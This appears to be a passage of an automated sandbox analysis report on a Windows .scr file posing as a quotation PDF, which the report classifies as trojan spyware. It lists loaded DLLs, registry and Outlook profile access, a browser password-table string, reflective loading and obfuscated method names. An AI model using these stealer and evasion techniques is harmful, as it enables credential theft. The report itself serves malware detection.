                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@3/0@3/3
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMutant created: NULL
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3288501589.000000000419D000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003264000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003274000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003282000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrVirustotal: Detection: 34%
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrReversingLabs: Detection: 13%
                Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, Pdtho.cs.Net Code: Flpibfvlbhe System.AppDomain.Load(byte[])
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: Yara matchFile source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852, type: MEMORYSTR
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_063F2F7D push es; ret 0_2_063F2F90
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_063F70BE pushfd ; ret 0_2_063F70C1
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_01641B0D push 0000002Fh; ret 4_2_01641B0F
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_01648290 push esi; ret 4_2_01648298
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_0164768E push ecx; iretd 4_2_0164769D
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068876EF push es; ret 4_2_068876F0
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_06886C65 push es; iretd 4_2_06886C70
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 4_2_068880B3 push es; iretd 4_2_068880B4
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, S1Zbg2pp4rKsDwwU6hU.csHigh entropy of concatenated method names: 'evSgnamFd4', 'l7Hgp65Cd3', 'cu6gS4YKVR', 'JnqgZl13qU', 'psygK57mQZ', 'VtCgNZSgS6', 'YlN6W2KaFkLY6wukmJD', 'nuhdB6KhLAS4t2nqbA3', 'lpapx5j388', 'zunpU1Z1rR'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, FLQdLKipqaaenTJXjB.csHigh entropy of concatenated method names: 'Tqfn3DavBZ', 'QAunHLlwgu', 'H5Viw7K5iQF5pXkAHet', 'GlLBosKjBYDl6M3OHQp', 'OVDnesZ0hp', 'qw6nYQL4Fm', 'by1nRJZHoF', 'yRhnAnxZUA', 'sfonL39AHB', 'ydZnht7xjE'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, WYLyjjj40ulemrXCrq.csHigh entropy of concatenated method names: 'XAVrd6Etk', 'bgBRKClva', 'Equals', 'GetHashCode', 'FTuPiIhDL', 'ToString', 'RW7MxbowrOr4GHg4qBt', 'SiofoRoEwZom2wSEuIU', 'Equals', 'GetHashCode'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.csHigh entropy of concatenated method names: 'zs2LC7Nh2kmxionfSaD', 'WdQSc1NGILvK5s8n1p1', 'upMZxjlaFA', 'vh0ry9Sq2v', 'UEOZ9jojct', 'HYgZqRCBn0', 'FYxZ58VM1F', 'K13ZjVCDat', 'b6U9F3qIs7', 'isFU2xeVGX'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, MozilSpeed.csHigh entropy of concatenated method names: 'O96gi5Mr9H', 'xKEgBZPJrZ', 'uUggO6BXvW', 'm93gbGFJog', 'XffgzNX88v', 'GN2xJ6WWls', 'chmYwGNo3kYiKQMaRv8', 'SUPVH7NK81etvfCRxWf', 'oNJxSKbHI1', 'VJbxZmjSqK'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, O0Xg0iZCGY2HILYMOtg.csHigh entropy of concatenated method names: 'BLYZyvD1T8', 'ngqZA2YbP4', 'mhdZLUDlrq', 'KKVZa6gQWE', 'UUTZhGMQ5d', 'r7pZG9drDa', 'UseZ18caIH', 'Ur9ZvKkx8U', 'WjbZFtQg9u', 'Fr4ZcylOCZ'
                Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6970000.5.raw.unpack, S6TDLc8IE8bNBtjRbO5.csHigh entropy of concatenated method names: 'e5m8OKCmvU', 'y4p8qeKE2F', 'hiS8extCV8', 'IKA8hTcElF', 'XbV8kesJDN', 'by08MLSvwN', 'KZ881lxbE5', 'zUW8iTYC0q', 'JxA8XA026y', 'E9O8xHEXIp'
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
